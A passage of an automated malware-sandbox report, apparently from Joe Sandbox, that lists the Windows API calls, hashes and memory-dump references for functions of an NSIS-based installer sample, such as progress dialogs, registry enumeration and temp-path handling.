                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                    • Part of subcall function 00402CFC: MulDiv.KERNEL32(00000000,00000064,0000135E), ref: 00402D11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
                                                  • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                  • Opcode Fuzzy Hash: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
                                                  • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                  • GetMessagePos.USER32 ref: 00404A7F
                                                  • ScreenToClient.USER32(?,?), ref: 00404A99
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
                                                  • wsprintfW.USER32 ref: 00402CCF
                                                  • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                  • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                  • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                  • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                  APIs
                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                  • GlobalFree.KERNEL32(?), ref: 10001928
                                                  • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                  • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal$lstrcpy
                                                  • String ID:
                                                  • API String ID: 176019282-0
                                                  • Opcode ID: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
                                                  • Instruction ID: 9dc2e970d319025c61fe02030ab53e3dbd452a3027dd4f32e7c9f695cea78b30
                                                  • Opcode Fuzzy Hash: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
                                                  • Instruction Fuzzy Hash: D451C536F0111AEBFB10DFA488805EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                  • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                  • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                  • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                  • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                  • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                                                  • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                  • Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                                                  • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D44
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                  • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                                                  • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                  • Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                                                  • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                  • wsprintfW.USER32 ref: 00404A10
                                                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                  • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                  • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                  • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                  • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                  • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                  • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00405939
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00405943
                                                  • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3081826266
                                                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                                                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 1404258612-0
                                                  • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                  • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                  • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                  • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405135
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                    • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                  • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                  • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                  • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,004037F4,74DF3420,0040361F,?), ref: 00403837
                                                  • GlobalFree.KERNEL32(?), ref: 0040383E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
